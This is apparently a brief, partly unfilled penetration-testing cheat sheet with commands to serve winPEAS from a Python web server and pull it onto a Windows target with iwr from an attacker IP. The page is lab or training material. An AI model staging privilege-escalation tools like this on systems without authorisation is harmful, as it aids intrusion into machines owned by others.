Pre-made commands
Copy winpeas to the working directory and start a web server
cp /usr/share/peass/winpeas/winPEASx64.exe . && python3 -m http.server 80on windows, use iwr to retrieve the winpeas exe:
iwr -uri http://192.168.45.227:9876/windows/winPEASany.exe -Outfile winpeas.exeFlags
| Flag | Description |
|---|---|
| -x | What does it do |
Useful Scripts
Useful bash script
#!/bin/bash